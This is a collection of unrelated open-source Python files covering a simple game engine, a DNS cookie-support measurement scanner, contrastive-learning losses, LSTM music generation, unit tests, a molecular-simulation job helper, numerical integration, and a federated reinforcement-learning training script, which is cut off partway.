+{"seq_id":"5611439532","text":"import glm\nimport os\nimport sys\n\n# sys.path.append(os.path.dirname(__file__) + \"/../\")\nsys.path.append(sys.path[0] + \"/../\")\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom Source.System.gameObject import *\n\n\nclass GameObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # texture obj\n self.Texture = \"\"\n self.Color = glm.vec3(1.0, 1.0, 1.0)\n # flags\n self.IsSolid = False\n self.Destroyed = False\n\n def Draw(self, system):\n system.SpriteRenderer.DrawNoTex(self.position, self.Size,\n self.Rotation, self.Color, self.Grid, self.Selected)\n\n\nclass BallObject(Sprite):\n\n def __init__(self):\n super().__init__()\n # ball attributes\n self.Radius = float(0)\n self.Stuck = True\n\n def BallMove(self, dt, window_width):\n if not self.Stuck:\n self.position = self.position + (self.Velocity * dt)\n\n if self.position.x <= 0.0:\n self.Velocity.x = -self.Velocity.x\n self.position.x = 0.0\n\n elif (self.position.x + self.Size.x) >= window_width:\n self.Velocity.x = -self.Velocity.x\n self.position.x = window_width - self.Size.x\n\n if self.position.y <= 0.0:\n self.Velocity.y = -self.Velocity.y\n self.position.y = 0.0\n\n return self.position\n\n def Reset(self, position, velocity):\n self.position = position\n self.Velocity = velocity\n self.Stuck = True\n\n\n","repo_name":"KingAiba/FYPEngine","sub_path":"Game/GameObjectV2.py","file_name":"GameObjectV2.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72587348809","text":"\"\"\"\nBase script for measuring whether IPs return server cookies.\nBy default, we'll retry the server a number of times if errors are received\n\"\"\"\n\nimport argparse\nimport json\nimport multiprocessing as mp\nimport signal\nimport sys\nimport time\nfrom typing import Union\n\nimport dns.resolver\nfrom dns.edns import GenericOption\nfrom dns.message import make_query\nfrom shared.query_parser_generator import QnameParserGenerator\nfrom tqdm import tqdm\n\nCLIENT_COOKIE_LENGTH = 8\nCOOKIE_OPT = 10\nCOOKIE = \"1e4ddeb526a1da40\"\njson_keys = [\"ip\", \"domain\", \"edns\", \"ccook\", \"scook\", \"slen\", \"rcode\", \"err\", \"isbind\", \"tsdiff\"]\n\n\nclass QPG(QnameParserGenerator):\n \"\"\" defines query format to include timestamp and og ip \"\"\"\n label_str = \"$key.$ts.$ip\"\n\n\ndef makedict(default=None):\n return {key: default for key in json_keys}\n\n\ndef make_cookie_query(qname: str, cookie_hex: str = COOKIE) -> dns.message:\n cookie = GenericOption(COOKIE_OPT, bytes.fromhex(cookie_hex))\n return make_query(qname, dns.rdatatype.A, use_edns=True,\n want_dnssec=False, options=[cookie])\n\n\ndef extract_cooks(r: dns.message.Message) -> (str, str):\n for o in r.options:\n if o.otype == COOKIE_OPT:\n return o.data[:8].hex(), o.data[8:].hex()\n return \"\", \"\"\n\n\ndef is_using_bind(scook: str, current_timestamp: int = None) -> Union[None, int]:\n \"\"\"\n Returns true if the server cookie is 128 bits and has a timestamp at the 5th-8th bytes.\n Bind or bind-like implementations have a timestamp at that location.\n Tolerance for the timestamp is 1hr in past and 30 min in future being valid. This seemed like a good range to use.\n\n :param scook: the cookie returned by the server\n :param current_timestamp: the timestamp to compare against. If none, gets current time\n :return: the difference between the bind ts and current time if bind, else None\n \"\"\"\n if len(scook) != 32: # bind cookie is 128 bits = 16 bytes = 32 hex characters\n return None\n cookie_timestamp = int(scook[8:16], 16)\n if current_timestamp is None:\n current_timestamp = int(time.time())\n if (current_timestamp - 60 * 60) <= cookie_timestamp <= (current_timestamp + 60 * 30):\n return cookie_timestamp - current_timestamp\n return None\n\n\ndef query(input_dict, try_again=5):\n \"\"\"\n :param input_dict: should contain an ip and domain key. IP will be queried for an A record of domain\n :param try_again: if greater than 0, retry up to N times if an error or no server cookie\n :return: a response dict with all relevant data\n \"\"\"\n res = makedict()\n res[\"ip\"] = input_dict[\"ip\"]\n if input_dict['domain'] is None:\n res['domain'] = QPG.gen('cookie-support.example.com', ip_addr=res['ip'], val=try_again)\n else:\n res[\"domain\"] = input_dict[\"domain\"] if \"domain\" in input_dict else input_dict[\"zone\"]\n\n q = make_cookie_query(res[\"domain\"])\n try:\n r: dns.message.Message = dns.query.udp(q, input_dict[\"ip\"], timeout=5)\n except Exception as e:\n if try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"err\"] = str(e)\n else:\n res[\"ccook\"], res[\"scook\"] = extract_cooks(r)\n if res[\"scook\"] == \"\" and try_again > 0:\n time.sleep(1)\n return query(input_dict, try_again - 1)\n res[\"tsdiff\"] = is_using_bind(res[\"scook\"])\n res[\"rcode\"] = r.rcode()\n res[\"edns\"] = r.edns >= 0\n res[\"isbind\"] = res[\"tsdiff\"] is not None\n res[\"slen\"] = len(res[\"scook\"]) / 2\n\n return res\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=\"Run a series of dns queries on a list of IPs and record cookie info\")\n parser.add_argument('input', help=\"Input file containing a json lines with ip and optional domain keys. \"\n \"An 'A' query for 'domain' will be sent to 'ip'\")\n parser.add_argument('output', help=\"Output file to write results to\")\n parser.add_argument('-n', '--num-threads', help=\"Number of threads to execute queries\", default=64, type=int)\n parser.add_argument('-g', '--gen-domains', help=\"Generate domains to query for instead of getting from jsonl\",\n action='store_true')\n args = parser.parse_args(args)\n\n print(\"Getting targets...\")\n with open(args.input, 'r') as in_file:\n targets = [json.loads(t) for t in in_file.readlines()]\n if args.gen_domains:\n for t in targets:\n t[\"domain\"] = None\n\n threads = min(args.num_threads, len(targets))\n\n print(\"Starting threads...\")\n with open(args.output, 'w') as output:\n with mp.Pool(processes=threads, initializer=lambda: signal.signal(signal.SIGINT, signal.SIG_IGN)) as p:\n try:\n for result in tqdm(p.imap_unordered(query, targets), total=len(targets), unit=\"query\"):\n output.write(json.dumps(result) + \"\\n\")\n except KeyboardInterrupt:\n p.terminate()\n p.join()\n print(\"Exiting early from queries.\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"byu-imaal/dns-cookies-pam21","sub_path":"cookie_support.py","file_name":"cookie_support.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19950812810","text":"import torch\nimport torch.nn.functional as F\n\ndef oneway_infonce_loss(a, b, t, smoothing=0.0, labels=None):\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n loss = F.cross_entropy(logits, labels, label_smoothing=smoothing).mean()\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n accuracy = torch.sum(preds == labels) / len(a)\n \n return loss, accuracy\n\ndef infonce_loss(a, b, t, smoothing=0.0, labels=None):\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T)) * torch.exp(t).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n '''\n if labels is not None:\n loss_a = F.cross_entropy(logits.T, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n loss_b = F.cross_entropy(logits, gt, label_smoothing=smoothing, reduction='none')[labels.long()].mean()\n\n loss = (loss_a + loss_b) / 2\n else:'''\n loss = (F.cross_entropy(logits.T, gt, label_smoothing=smoothing).mean() +\n F.cross_entropy(logits, gt, label_smoothing=smoothing).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n\ndef flatnce_loss(a, b, t, smoothing=0.0, labels=None):\n #from https://github.com/Junya-Chen/FlatCLR/blob/main/flatclr.py\n\n batch_size = a.shape[0]\n logits = (F.normalize(a) @ F.normalize(b.T))# * torch.exp(t).clamp(max=100)\n labels = torch.arange(0, batch_size, device=logits.device)\n\n # discard the main diagonal from both: labels and similarities matrix\n mask = 1 - torch.eye(batch_size).to(logits.device) # Positive and negative example similarities\n logits_pos = torch.diagonal(logits).view(batch_size, -1) # Get positive similarities\n\n clogits_a = mask * (logits - logits_pos) * torch.exp(t).clamp(max=100, min=-100)\n clogits_b = mask * (logits.T - logits_pos) * torch.exp(t).clamp(max=100, min=-100) \n\n sum_a = torch.logsumexp(clogits_a, dim=1) - 1 # To offset exp(0) per row\n sum_b = torch.logsumexp(clogits_b, dim=1) - 1 \n sum_clogits = torch.cat([sum_a, sum_b], dim=0)\n\n loss_vector = torch.exp(sum_clogits-sum_clogits.detach())\n \n with torch.no_grad():\n dummy_logits = logits * mask\n dummy_loss = (F.cross_entropy(dummy_logits.T, labels, label_smoothing=smoothing).mean() +\n F.cross_entropy(dummy_logits, labels, label_smoothing=smoothing).mean()) / 2\n\n loss = loss_vector.mean() - 1 + dummy_loss\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == labels) +\n torch.sum(preds_t == labels)) / (batch_size * 2)\n\n return loss, accuracy\n\nclass SupConLoss(torch.nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, t_0=0.07, eps=1e-8):\n super(SupConLoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n self.epsilon = eps\n\n\n def forward(self, features, labels):\n \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n Returns:\n A loss scalar.\n \"\"\"\n batch_size = features.shape[0]\n\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(features.device)\n\n views = features.shape[1] # = n_views\n full_features = torch.cat(torch.unbind(features, dim=1), dim=0) # = [bsz*views, ...]\n\n # compute logits (cosine sim)\n anchor_dot_contrast = torch.matmul(F.normalize(full_features),\n F.normalize(full_features.T)) * torch.exp(self.temperature).clamp(100) # = [bsz*views, bsz*views]\n\n loss_0 = self._loss_from_dot(anchor_dot_contrast, mask, views, batch_size)\n loss_1 = self._loss_from_dot(anchor_dot_contrast.T, mask.T, views, batch_size)\n\n return (loss_0 + loss_1) / 2\n\n def _loss_from_dot(self, anchor_dot_contrast, mask, views, batch_size): #(anchor, contrast)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(views, views)\n # mask-out self-contrast cases\n logits_mask = 1 - torch.eye(views*batch_size, device=mask.device)\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True) + self.epsilon)\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n loss = - mean_log_prob_pos.view(views, batch_size).mean()\n\n return loss\n\nclass InfoNCELoss(torch.nn.Module):\n def __init__(self, t_0=0.07, eps=1e-8):\n super(InfoNCELoss, self).__init__()\n self.temperature = torch.nn.Parameter(torch.tensor([t_0]))\n\n def forward(self, anchors, replicas):\n batch_size = anchors.shape[0]\n logits = (F.normalize(anchors) @ F.normalize(replicas.T)) * torch.exp(self.temperature).clamp(max=100)\n gt = torch.arange(0, batch_size, device=logits.device) \n\n loss = (F.cross_entropy(logits.T, gt).mean() +\n F.cross_entropy(logits, gt).mean()) / 2\n\n with torch.no_grad():\n preds = logits.argmax(-1)\n preds_t = logits.T.argmax(-1)\n\n accuracy = (torch.sum(preds == gt) +\n torch.sum(preds_t == gt)) / (batch_size * 2)\n\n return loss, accuracy\n","repo_name":"jahuerta92/authorship-embeddings","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"27657232498","text":"import copy\nimport numpy as np\nimport tensorflow as tf\nfrom keras import Input, Model\nfrom keras.layers import Bidirectional, Dense, Dropout, LSTM\nfrom keras.optimizers import Adam\n\nfrom examples import remove_rhythm\nfrom musicLoading import make_midi, load_data\n\ndef get_model_to_train():\n inputs = Input(shape=(256,8), dtype=tf.int64)\n # inputs = Input(shape=X_train[0].shape)\n\n lstm = Bidirectional(LSTM(124), merge_mode='concat', dtype=tf.int64)(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n\n model = Model(inputs=inputs, outputs=[pred])\n opt = tf.keras.optimizers.Adam(lr=1e-3, decay=1e-5)\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n\ndef recursive_predic(model, startingData):\n result = copy.deepcopy(startingData)\n\n result.append([85,84,83,82,81,80,0,0])\n\n curData = copy.deepcopy(startingData)\n for i in range(16 * 32):\n curData = np.array([curData])\n newNotes = model.predict(curData)[0]\n notes = [0] * 8\n\n noteCount = 0\n\n for note in range(len(newNotes)):\n if newNotes[note] > .25:\n notes[noteCount] = note\n noteCount+=1\n if noteCount == 8:\n break\n\n result.append(notes)\n curData = np.delete(curData[0], 0, axis=0)\n curData = np.append(curData, [notes], axis=0)\n # curData = np.array([curData)\n\n print(\"Raw results\", result)\n\n return result\n\ndef results_to_midi(results):\n quantized = []\n\n for beat in results:\n curBeatNotes = []\n\n for note in beat:\n if note == 0:\n break;\n\n curBeatNotes.append([note + 21, 1])\n\n quantized.append(curBeatNotes)\n\n midi = make_midi(quantized, 480)\n midi.open(\"single notes.mid\", 'wb')\n midi.write()\n\nif __name__ == '__main__':\n session = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n # print(device_lib.list_local_devices())\n\n input_size = 256\n\n\n\n inputs = Input(shape=(256,8))\n lstm = Bidirectional(LSTM(124), merge_mode='concat')(inputs)\n pred1 = Dense(88, activation='sigmoid')(lstm)\n\n pred = Dropout(.4)(pred1)\n model = Model(inputs=inputs, outputs=[pred])\n opt = Adam(lr=1e-3, decay=1e-5)\n\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n model.load_weights('best_weights.hdf5')\n\n\n midData = load_data(\"/home/whomagoo/github/MLMusic/Music/kunstderfuge.com/scarlatti 109.mid\")\n\n notes = remove_rhythm(midData)\n notes = notes[:input_size]\n\n # starting_notes = [[72, 64, 0, 0, 0, 0, 0, 0], [72, 69, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [63, 0, 0, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [68, 71, 52, 0, 0, 0, 0, 0], [64, 0, 0, 0, 0, 0, 0, 0], [84, 72, 57, 0, 0, 0, 0, 0]]\n # padded_input = [[0] * 8] * (input_size - len(starting_notes)) + starting_notes\n\n i = 0\n for chord in notes:\n j = 0\n for note in chord:\n if note != 0:\n notes[i][j] -= 21\n\n j+=1\n i+=1\n\n results = recursive_predic(model, notes)\n\n print(results)\n\n results_to_midi(results)\n\n session.close()","repo_name":"WHOmagoo/Machine-Learning-Music","sub_path":"src/first_version.py","file_name":"first_version.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35914004390","text":"import unittest\nimport os\nfrom .helper import UtilityMethods\nimport multisite\n\n\nclass TestLocal(UtilityMethods):\n def test_add_local_site(self):\n config_file = os.path.join(self.workspace, 'add_local_site.json')\n msite = multisite.Multisite(config_file=config_file)\n msite.add_site('local', 'local-site', source_type='local')\n expected = {\n \"local\": {\n \"name\": \"local\",\n \"source\": \"local-site\",\n \"location\": \"local-site\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_existing_config_file(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n expected = {\n \"local-site\": {\n \"name\": \"local-site\",\n \"source\": \"local-site/\",\n \"location\": \"local-site/\",\n \"source_type\": \"local\",\n \"auto_update\": False\n }\n }\n self.assertDictEqual(msite.sites, expected)\n\n def test_bad_directory_path(self):\n config_file = os.path.join('configs', 'local.json')\n msite = multisite.Multisite(config_file=config_file)\n with self.assertRaises(OSError):\n msite.add_site(\n 'bad-dir',\n os.path.join('archives', 'zip-site.zip'),\n source_type='local'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cmccandless/multisite","sub_path":"tests/local_test.py","file_name":"local_test.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"7368187078","text":"# list of parameters (in this case torsional angle Y)\nPARAMETER_LIST = range(-180, 185, 5)\n\n# user defined function to start a job, depending on one element from PARAMETER_LIST\ndef run_calc(param):\n \n # modules necessary for running the job\n import os\n import shutil\n \n # user variables for calculation\n PLACEHOLDER = \"RESTRAINT_2\" # placeholder in CAST.txt file that is replaced by step number\n \n # create folder for current window\n os.mkdir(\"f_{}\".format(param))\n\n # copy necessary files to that folder (USER INPUT)\n shutil.copy(\"CAST.txt\", \"f_{}/CAST.txt\".format(param))\n shutil.copy(\"pentan.arc\", \"f_{}/pentan.arc\".format(param))\n shutil.copy(\"charmm22.prm\", \"f_{}/charmm22.prm\".format(param))\n shutil.copy(\"/home/susanne/CAST/optional_files/build/CAST_linux_x64_release\",\n \"f_{}/CAST.exe\".format(param))\n \n # important: set correct parameter in inputfile\n with open(\"f_{}/CAST.txt\".format(param)) as inp:\n x = inp.read()\n x = x.replace(PLACEHOLDER,str(float(param)))\n with open(\"f_{}/CAST.txt\".format(param),\"w\") as inp:\n inp.write(x)\n \n # submit calculation\n os.chdir(\"f_{}\".format(param))\n os.popen(\"chmod +x CAST.exe\")\n os.popen(\"./CAST.exe | tee CAST_OUTPUT.txt\")\n os.chdir(\"..\")\n\n\n########################################### PROGRAM ########################################\n\nfor p in PARAMETER_LIST:\n run_calc(p)\n \n","repo_name":"AKEngels/CAST","sub_path":"optional_files/scripts/umbrella_stuff/umbrella2d_helper.py","file_name":"umbrella2d_helper.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41935628573","text":"from math import pi\n\nimport view\nimport integral\n\n\ndef main() -> None:\n tetta = [0.05, 0.05, 10.0]\n\n ns, ms = [], []\n md1s, md2s = [], []\n ints = []\n\n terminate = '0'\n while terminate == '0':\n try:\n ns.append(int(input(\"Input N: \")))\n ms.append(int(input(\"Input M: \")))\n param = float(input(\"Enter parameter: \"))\n print(\"Entry integration mode (0 - Gauss, 1 - Simpson)\")\n md1s.append(int(input(\"Outer integration mode: \")))\n md2s.append(int(input(\"Inner integration mode: \")))\n except ValueError:\n print(\"Invalid input data. Program is terminated.\")\n return\n\n lm = [[0, pi / 2], [0, pi / 2]]\n\n ints.append(integral.Integral(lm, [ns[-1], ms[-1]], [md1s[-1], md2s[-1]]))\n\n print(\"Result with {} as a parameter is {:.5f}\".format(tetta, ints[-1](param)))\n\n terminate = input(\"If you want stop execution, entry not 0?: \")\n view.plot(ints, tetta, ns, ms, md1s, md2s)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Flash1ee/ca-labs-4th-sem-bmstu","sub_path":"lab_05/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1541886484","text":"# -*- coding: utf-8 -*-\n#from __future__ import division\nimport argparse\nimport bz2\nfrom datetime import datetime\nimport os\nimport sys\n\nsys.path.append('../..')\nsys.path.append('./')\n\nimport pickle\nimport GLOBAL_PRARM as gp\n\nimport numpy as np\nimport math\nimport copy\nimport torch\nfrom tqdm import trange\nfrom collections import defaultdict, deque\n\nimport multiprocessing\nimport torch.multiprocessing\n# torch.multiprocessing.set_sharing_strategy('file_system')\n# TODO: When running in server, uncomment this line if needed\nimport copy as cp\n\nfrom acer_fedstep.agent import Agent\nfrom game import Decentralized_Game as Env\nfrom memory import ReplayMemory\nfrom test import test, test_p\n\n# from pympler.tracker import SummaryTracker\n# tracker = SummaryTracker()\n\n# Note that hyperparameters may originally be reported in ATARI game frames instead of agent steps\nparser = argparse.ArgumentParser(description='Rainbow')\nparser.add_argument('--id', type=str, default='default_acer_q', help='Experiment ID')\nparser.add_argument('--seed', type=int, default=123, help='Random seed')\nparser.add_argument('--disable-cuda', action='store_true', help='Disable CUDA')\nparser.add_argument('--T-max', type=int, default=int(50e6), metavar='STEPS',\n help='Number of training steps (4x number of frames)')\nparser.add_argument('--max-episode-length', type=int, default=int(108e3), metavar='LENGTH',\n help='Max episode length in game frames (0 to disable)')\n# TODO: Note that the change of UAV numbers should also change the history-length variable\nparser.add_argument('--previous-action-observable', action='store_false', help='Observe previous action? (AP)')\nparser.add_argument('--current-action-observable', action='store_true', help='Observe previous action? (AP)')\nparser.add_argument('--history-length', type=int, default=2, metavar='T',\n help='Total number of history state')\nparser.add_argument('--architecture', type=str, default='canonical_61obv_16ap', metavar='ARCH', help='Network architecture')\n# TODO: if select resnet8, obs v8 and dims 4 should be set in gp\nparser.add_argument('--hidden-size', type=int, default=256, metavar='SIZE', help='Network hidden size')\nparser.add_argument('--noisy-std', type=float, default=0.3, metavar='σ',\n help='Initial standard deviation of noisy linear layers')\nparser.add_argument('--atoms', type=int, default=21, metavar='C', help='Discretised size of value distribution')\nparser.add_argument('--V-min', type=float, default=-1, metavar='V', help='Minimum of value distribution support')\nparser.add_argument('--V-max', type=float, default=1, metavar='V', help='Maximum of value distribution support')\n# TODO: Make sure the value located inside V_min and V_max\nparser.add_argument('--epsilon-min', type=float, default=0.0, metavar='ep_d', help='Minimum of epsilon')\nparser.add_argument('--epsilon-max', type=float, default=0.0, metavar='ep_u', help='Maximum of epsilon')\nparser.add_argument('--epsilon-delta', type=float, default=0.0001, metavar='ep_d', help='Decreasing step of epsilon')\n# TODO: Set the ep carefully\nparser.add_argument('--action-selection', type=str, default='boltzmann', metavar='action_type',\n choices=['greedy', 'boltzmann', 'no_limit'],\n help='Type of action selection algorithm, 1: greedy, 2: boltzmann')\nparser.add_argument('--model', type=str, default=None, metavar='PARAM', help='Pretrained model (state dict)')\nparser.add_argument('--memory-capacity', type=int, default=int(12e3), metavar='CAPACITY',\n help='Experience replay memory capacity')\nparser.add_argument('--replay-frequency', type=int, default=4, metavar='k', help='Frequency of sampling from memory')\nparser.add_argument('--priority-exponent', type=float, default=0.5, metavar='ω',\n help='Prioritised experience replay exponent (originally denoted α)')\nparser.add_argument('--priority-weight', type=float, default=0.4, metavar='β',\n help='Initial prioritised experience replay importance sampling weight')\nparser.add_argument('--multi-step', type=int, default=1, metavar='n',\n help='Number of steps for multi-step return')\nparser.add_argument('--discount', type=float, default=1, metavar='γ', help='Discount factor')\nparser.add_argument('--target-update', type=int, default=int(4000), metavar='τ',\n help='Number of steps after which to update target network')\nparser.add_argument('--reward-clip', type=int, default=1, metavar='VALUE', help='Reward clipping (0 to disable)')\nparser.add_argument('--learning-rate', type=float, default=0.0000625, metavar='η', help='Learning rate')\nparser.add_argument('--reward-update-rate', type=float, default=0.01, metavar='η',\n help='Average value step rate (for non-episodic task)')\nparser.add_argument('--adam-eps', type=float, default=1.5e-4, metavar='ε', help='Adam epsilon')\nparser.add_argument('--batch-size', type=int, default=32, metavar='SIZE', help='Batch size')\nparser.add_argument('--better-indicator', type=float, default=1.05, metavar='b',\n help='The new model should be b times of old performance to be recorded')\n# TODO: Switch interval should not be large\nparser.add_argument('--learn-start', type=int, default=int(400), metavar='STEPS',\n help='Number of steps before starting training')\nparser.add_argument('--evaluate', action='store_true', help='Evaluate only')\nparser.add_argument('--data-reinforce', action='store_true', help='DataReinforcement')\n# TODO: Change this after debug\nparser.add_argument('--evaluation-interval', type=int, default=400, metavar='STEPS',\n help='Number of training steps between evaluations')\nparser.add_argument('--evaluation-episodes', type=int, default=1000, metavar='N',\n help='Number of evaluation episodes to average over')\n# TODO: Note that DeepMind's evaluation method is running the latest agent for 500K frames ever every 1M steps\n# TODO: Change this after debug\nparser.add_argument('--evaluation-size', type=int, default=20, metavar='N',\n help='Number of transitions to use for validating Q')\n# TODO: This evaluation-size is used for Q value evaluation, can be small if Q is not important\nparser.add_argument('--render', action='store_false', help='Display screen (testing only)')\nparser.add_argument('--enable-cudnn', action='store_true', help='Enable cuDNN (faster but nondeterministic)')\nparser.add_argument('--checkpoint-interval', default=0,\n help='How often to checkpoint the model, defaults to 0 (never checkpoint)')\nparser.add_argument('--memory', type=str,\n help='Path to save/load the memory from')\nparser.add_argument('--disable-bzip-memory', action='store_false',\n help='Don\\'t zip the memory file. Not recommended (zipping is a bit slower and much, much smaller)')\n# TODO: Change federated round each time\nparser.add_argument('--federated-round', type=int, default=20, metavar='F',\n help='Rounds to perform global combination, set a negative number to disable federated aggregation')\n\n# Setup\nargs = parser.parse_args()\n\nprint(' ' * 26 + 'Options')\nfor k, v in vars(args).items():\n print(' ' * 26 + k + ': ' + str(v))\nresults_dir = os.path.join('./results', args.id)\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n\nmetrics = {'steps': [], 'rewards': [], 'Qs': [], 'best_avg_reward': -float('inf')}\nmetrics_all = {'steps': [], 'reward': []}\nnp.random.seed(args.seed)\ntorch.manual_seed(np.random.randint(1, 10000))\n# if torch.cuda.is_available() and not args.disable_cuda:\n# args.device = torch.device('cuda')\n# torch.cuda.manual_seed(np.random.randint(1, 10000))\n# torch.backends.cudnn.enabled = args.enable_cudnn\n# else:\n# args.device = torch.device('cpu')\nargs.device = torch.device('cpu')\n\n\n# Simple ISO 8601 timestamped logger\ndef log(s):\n print('[' + str(datetime.now().strftime('%Y-%m-%dT%H:%M:%S')) + '] ' + s)\n\n\ndef average_weights(list_of_weight):\n \"\"\"aggregate all weights\"\"\"\n averga_w = copy.deepcopy(list_of_weight[0])\n for key in averga_w.keys():\n for ind in range(1, len(list_of_weight)):\n averga_w[key] += list_of_weight[ind][key]\n averga_w[key] = torch.div(averga_w[key], len(list_of_weight))\n return averga_w\n\n\ndef load_memory(memory_path, disable_bzip):\n if disable_bzip:\n with open(memory_path, 'rb') as pickle_file:\n return pickle.load(pickle_file)\n else:\n with bz2.open(memory_path, 'rb') as zipped_pickle_file:\n return pickle.load(zipped_pickle_file)\n\n\ndef save_memory(memory, memory_path, disable_bzip, index=-1):\n # save ap mem\n memory_path = memory_path[0:-4] + str(index) + memory_path[-4:]\n if disable_bzip:\n with open(memory_path, 'wb') as pickle_file:\n pickle.dump(memory, pickle_file)\n else:\n with bz2.open(memory_path, 'wb') as zipped_pickle_file:\n pickle.dump(memory, zipped_pickle_file)\n\n\ndef run_game_once_parallel_random(new_game, train_history_aps_parallel, episode):\n train_examples_aps = []\n for _ in range(new_game.environment.ap_number):\n train_examples_aps.append([])\n eps, done = 0, True\n while eps < episode:\n if done:\n done = new_game.reset()\n state, action, action_logp, avail, reward, done, _ = new_game.step() # Step\n for index_p, ele_p in enumerate(state):\n neighbor_indice = new_game.environment.coop_graph.neighbor_indices(index_p, True)\n action_patch = np.append(action, [-1])\n train_examples_aps[index_p].append((ele_p, action[index_p], action_logp[index_p],\n action_patch[neighbor_indice],\n action, avail[index_p], reward[index_p], done))\n eps += 1\n train_history_aps_parallel.append(train_examples_aps)\n\n\n# Environment\nenv = Env(args)\naction_space = env.get_action_size()\n\n# Agent\ndqn = []\nmatric = []\nfor _ in range(env.environment.ap_number):\n # dqn.append(temp)\n dqn.append(Agent(args, env, _))\n matric.append(copy.deepcopy(metrics))\n\nglobal_model = Agent(args, env, \"Global_\")\n\n# If a model is provided, and evaluate is fale, presumably we want to resume, so try to load memory\nif args.model is not None and not args.evaluate:\n if not args.memory:\n raise ValueError('Cannot resume training without memory save path. Aborting...')\n elif not os.path.exists(args.memory):\n raise ValueError('Could not find memory file at {path}. Aborting...'.format(path=args.memory))\n\n mem_aps = []\n for index in range(env.environment.ap_number):\n path = os.path.join(args.memory, ('metrics_aps' + str(index) + '.pth'))\n mem_aps.append(load_memory(path, args.disable_bzip_memory))\nelse:\n mem_aps = []\n for _ in range(env.environment.ap_number):\n mem_aps.append(ReplayMemory(args, args.memory_capacity, env.remove_previous_action))\n\ntry:\n sis_list = dqn[0].assign_sister_nodes\nexcept AttributeError:\n pass\nelse:\n for _ in range(env.environment.ap_number):\n dqn[_].assign_sister_nodes(dqn, mem_aps)\n# assign sister nodes for MADDPG\n\npriority_weight_increase = (1 - args.priority_weight) / (args.T_max - args.learn_start)\n\n# Construct validation memory\nval_mem_aps = []\nfor _ in range(env.environment.ap_number):\n val_mem_aps.append(ReplayMemory(args, args.evaluation_size, env.remove_previous_action))\nif not gp.PARALLEL_EXICUSION:\n T, done = 0, True\n while T < args.evaluation_size:\n if done:\n done = env.reset()\n state, action, action_logp, avail, reward, done, _ = env.step()\n for index, ele in enumerate(state):\n neighbor_indice = env.environment.coop_graph.neighbor_indices(index, True)\n action_patch = np.append(action, [-1])\n val_mem_aps[index].append(ele, action[index], action_logp[index], action_patch[neighbor_indice],\n action, avail[index], reward[index], done)\n T += 1\nelse:\n num_cores = min(multiprocessing.cpu_count(), gp.ALLOCATED_CORES) - 1\n num_eps 